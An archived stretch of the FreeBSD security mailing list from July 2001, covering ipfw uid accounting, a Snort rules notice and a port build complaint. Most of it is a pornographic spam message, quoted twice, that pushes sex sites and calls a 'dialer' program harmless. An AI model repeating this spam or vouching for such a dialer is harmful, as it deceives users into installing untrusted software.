05:44:18PM -0700, Gary Kline wrote: > > > > Please excuse the slight OT note, but this is to > > whomever put up the latest windowmaker version. Because > > I'm going to run it on my DNS server--outside my firewall--I > > dropped in the new port virtually at once. It builds, but > > bombs with the make install. Maybe a bad patch... (?) > > > > Anyway, this heads-up to anyone who is considering up- > > revving. > > This should have gone to -ports. > Arrgh, I was thinking security@freebsd.org and typed stable@freebsd.org instead. Agree that the original post (and this) should have gone to -ports. But I was happy to follow it as a -security issue. Anyway, I'm cc'ing this back there. gary -- Gary D. Kline kline@thought.org www.thought.org Public service Unix To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 27 20:43: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with ESMTP id 82D7237B403 for ; Fri, 27 Jul 2001 20:43:01 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 43863 invoked by uid 1000); 28 Jul 2001 03:43:00 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 28 Jul 2001 03:43:00 -0000 Date: Fri, 27 Jul 2001 22:43:00 -0500 (CDT) From: Mike Silbersack To: "Nickolay A.Kritsky" Cc: Subject: Re[2]: accounting with ipfw (gid, uid riles) In-Reply-To: <15993079421.20010727191853@internethelp.ru> Message-ID: <20010727223026.D43808-100000@achilles.silby.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, 27 Jul 2001, Nickolay A.Kritsky wrote: > do you mean that after this code: > //---------------------------------------------------------------- > setuid(0); > s=socket(...); > listen(s,1); > if (fork()!=-1) > { > setuid(1); > k=accept(s); > } > //---------------------------------------------------------------- > socket pointed by k will be "owned" by root? Yes. > Anyway, it is not the main point of my question. Accounting httpd > traffic is just a piece of cake - the port is fixed, the address is > fixed. But I wanted to count Squid traffic. AFAIK Squid does not any > setuid() voodoo, except for priviledges drop at startup. After that it > runs strictly uid 'nobody'. But squid's traffic doesn't hit the > counter!!! I wonder why. Maybe it is because of natd running on outer > interface? But why then some packets hit the counter? If squid runs the listen as root, all sockets created from that listen socket will also be accounted to root. Same problem as the above. I do not know how natd would affect connections in terms of uid accounting. Bug Robert Watson about this, the uid accounting is related to the jail/acl/mac/etc stuff which he has / will be working on. He could tell you if the uid can be changed at the accept handoff or not. > Sorry, but what does FWIW mean? "For what it's worth" Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 28 2: 8:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from pa169.kurdwanowa.sdi.tpnet.pl (pa169.kurdwanowa.sdi.tpnet.pl [213.77.148.169]) by hub.freebsd.org (Postfix) with ESMTP id 3D34337B403 for ; Sat, 28 Jul 2001 02:08:16 -0700 (PDT) (envelope-from kzaraska@student.uci.agh.edu.pl) Received: by pa169.kurdwanowa.sdi.tpnet.pl (Postfix, from userid 1001) id D209A1C67; Sat, 28 Jul 2001 11:08:00 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by pa169.kurdwanowa.sdi.tpnet.pl (Postfix) with ESMTP id 8A7455480 for ; Sat, 28 Jul 2001 11:08:00 +0200 (CEST) Date: Sat, 28 Jul 2001 11:08:00 +0200 (CEST) From: Krzysztof Zaraska X-Sender: kzaraska@lhotse.zaraska.dhs.org To: freebsd-security@freebsd.org Subject: telnetd exploit snort rules Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org For those of you running snort, the rules for telnetd exploit are available from www.snort.org. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 28 4:25:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from mydomain.com (t3o102p2.telia.com [194.255.255.2]) by hub.freebsd.org (Postfix) with ESMTP id D0F8237B406; Sat, 28 Jul 2001 04:25:41 -0700 (PDT) (envelope-from world1web@www.com) Date: Sat, 28 Jul 2001 13:25:40 +0100 From: WORLD1-WEB To: WORLD1-WEB@FreeBSD.ORG Subject: INCREDIBLE .. WORLDS NO.1 !! Message-Id: <20010728112541.D0F8237B406@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Ladies & Gentlemen, Are you ready to the experience of a lifetime ? As affiliates of the CIL group, we offer you to PLUGIN to the largest SEX-SERVER on the WEB, in order to get more than 3000 MegaBytes of the best and most sensational SEX on the entire Web! Why on earth do you think that thousands of people from 13 countries daily choose to visit 2 particular WebSites ? Very EASY answer! - The largest and most incredible content of LIVE SEX is offered! - State-of-the-art LIVE SHOWS with the wildest and most horny amateurs and pornstars in the world! - Hardcore LIVE SEX that hasnīt crossed your imagination! - Incredible & amazing themes from soft sex to the most bizarre sex! - Beautiful Girls & wild studs from almost every country, allowing you to watch, see & chat with awsome amateurs & pornstars who are blond, who are black, who are Scandinavian, who are Asian, who have BIG tits, who are shaved, who are pregnant who are .... you just name it ! - The best ever made SPY-CAMS, WATCH-CAMS, POOL-CAMS, SHOWER-CAMS, AMATEUR-CAMS ... etc! - Several high quality Interactive Cams & LIVE SEX Chat, where you are in controle ! - Much much more ... too much to mention ! EVERYTHING is offered 100% ANONOMOUSLY & you donīt need to sign-up or have a creditcard ... How simple is that ? PLUGIN now to our MEGA SEX-SERVER through any of the 2 AwardWinning Sites listed below, and get instantly access to more than 3000 MegaBytes of State-of-the-art WebSex! RIGHT HERE AT: http://siam.to/sexywebtv (This Site just has EVERYTHING you can imagine) ... If this Site does not open properly ... please try http://cyberu.to/hotweb Or this one, if you just love true LESBIAN SEX, CHAT and MORE from Sunny Ibiza in Spain: http://siam.to/sexybabestv ... If this Site does not open properly ... please try http://cyberu.to/hotbabes Enjoy your trip to paradise! VERY IMPORTANT HINT: To get DIRECT ACCESS to the webpages in the future, ALLWAYS keep the DIALER on your desktop or elsewhere on your PC ... Its easy, small and 100% harmless. Yours sincerely, WORLD1-WEB To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 28 5: 3:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from I-Sphere.COM (shell.i-sphere.com [209.249.146.70]) by hub.freebsd.org (Postfix) with ESMTP id 78D6B37B403 for ; Sat, 28 Jul 2001 05:03:47 -0700 (PDT) (envelope-from fasty@I-Sphere.COM) Received: (from fasty@localhost) by I-Sphere.COM (8.11.4/8.11.4) id f6SC9Pm02378; Sat, 28 Jul 2001 05:09:25 -0700 (PDT) (envelope-from fasty) Date: Sat, 28 Jul 2001 05:09:25 -0700 From: faSty To: WORLD1-WEB Cc: freebsd-security@freebsd.org Subject: Re: INCREDIBLE .. WORLDS NO.1 !! Message-ID: <20010728050925.A2363@i-sphere.com> References: <20010728112541.D0F8237B406@hub.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5i In-Reply-To: <20010728112541.D0F8237B406@hub.freebsd.org>; from world1web@www.com on Sat, Jul 28, 2001 at 01:25:40PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org oh crap another spam... -trev On Sat, Jul 28, 2001 at 01:25:40PM +0100, WORLD1-WEB wrote: > Ladies & Gentlemen, > > Are you ready to the experience of a lifetime ? > > As affiliates of the CIL group, we offer you to PLUGIN to the largest SEX-SERVER on the WEB, in order to get more than 3000 MegaBytes of the best and most sensational SEX on the entire Web! > > Why on earth do you think that thousands of people from 13 countries daily choose to visit 2 particular WebSites ? > > Very EASY answer! > > - The largest and most incredible content of LIVE SEX is offered! > - State-of-the-art LIVE SHOWS with the wildest and most horny amateurs and pornstars in the world! > - Hardcore LIVE SEX that hasnīt crossed your imagination! > - Incredible & amazing themes from soft sex to the most bizarre sex! > - Beautiful Girls & wild studs from almost every country, allowing you to watch, see & chat with awsome amateurs & pornstars who are blond, who are black, who are Scandinavian, who are Asian, who have BIG tits, who are shaved, who are pregnant who are .... you just name it ! > - The best ever made SPY-CAMS, WATCH-CAMS, POOL-CAMS, SHOWER-CAMS, AMATEUR-CAMS ... etc! > - Several high quality Interactive Cams & LIVE SEX Chat, where you are in controle ! > - Much much more ... too much to mention ! > > EVERYTHING is offered 100% ANONOMOUSLY & you donīt need to sign-up or have a creditcard ... How simple is that ? > > PLUGIN now to our MEGA SEX-SERVER through any of the 2 AwardWinning Sites listed below, and get instantly access to more than 3000 MegaBytes of State-of-the-art WebSex! > > RIGHT HERE AT: > > http://siam.to/sexywebtv (This Site just has EVERYTHING you can imagine) ... If this Site does not open properly ... please try > http://cyberu.to/hotweb > > Or this one, if you just love true LESBIAN SEX, CHAT and MORE from Sunny Ibiza in Spain: > > http://siam.to/sexybabestv ... If this Site does not open properly ... please try http://cyberu.to/hotbabes > > > > Enjoy your trip to paradise! > > VERY IMPORTANT HINT: > To get DIRECT ACCESS to the webpages in the future, ALLWAYS keep the DIALER on your desktop or elsewhere on your PC ... Its easy, small and 100% harmless. > > Yours sincerely, > WORLD1-WEB > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- In Lexington, Kentucky, it's illegal to carry an ice cream cone in your pocket. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 28 5:48: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (discworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id 9C1AB37B405 for ; Sat, 28 Jul 2001 05:47:56 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 2009 invoked by uid 1000); 28 Jul 2001 12:46:58 -0000 Date: Sat, 28 Jul 2001 15:46:58 +0300 From: Peter Pentchev To: faSty Cc: freebsd-security@freebsd.org Subject: Re: INCREDIBLE .. WORLDS NO.1 !! Message-ID: <20010728154658.A1249@ringworld.oblivion.bg> Mail-Followup-To: faSty , freebsd-security@freebsd.org References: <20010728112541.D0F8237B406@hub.freebsd.org> <20010728050925.A2363@i-sphere.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010728050925.A2363@i-sphere.com>; from fasty@i-sphere.com on Sat, Jul 28, 2001 at 05:09:25AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, Jul 28, 2001 at 05:09:25AM -0700, faSty wrote: > oh crap another spam... Look. Don't reply to the sender address of spam messages. This only lets them know that there really is a live person reading mail sent to that address, and makes them add the address (in this case, both freebsd-security and yours) to their lists for future spam mailings. G'luck, Peter -- This sentence is false. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 28 6:19: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 4691837B401 for ; Sat, 28 Jul 2001 06:19:06 -0700 (PDT) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (1709 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Sat, 28 Jul 2001 08:17:45 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Sat, 28 Jul 2001 08:17:45 -0500 (CDT) From: James Wyatt To: faSty Cc: freebsd-security@freebsd.org Subject: Re: INCREDIBLE .. WORLDS NO.1 !! In-Reply-To: <20010728050925.A2363@i-sphere.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, 28 Jul 2001, faSty wrote: > Date: Sat, 28 Jul 2001 05:09:25 -0700 > From: faSty > To: WORLD1-WEB > Cc: freebsd-security@freebsd.org > Subject: Re: INCREDIBLE .. WORLDS NO.1 !! > > oh crap another spam... > > -trev > > On Sat, Jul 28, 2001 at 01:25:40PM +0100, WORLD1-WEB wrote: > > Ladies & Gentlemen, > > > > Are you ready to the experience of a lifetime ? > > > > As affiliates of the CIL group, we offer you to PLUGIN to the largest SEX-SERVER on the WEB, in order to get more than 3000 MegaBytes of the best and most sensational SEX on the entire Web! 1) Did you *have* to include the spammer in the replies? (The address appears valid since www.com provides email accounts. Let us know if you get a bounce and you get off the hook for this one.) They now know the FreeBSD address is valid. (and how to unsubscribe (^_^) 2) Did you *have* to include the whole stinking thing AGAIN? 3) I like to counter Spam with information. Here is a URL for an interesting study of Spam and what encourages it: http://www.cnet.com/software/0-3227888-8-6602372-1.html Hope this helps... - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message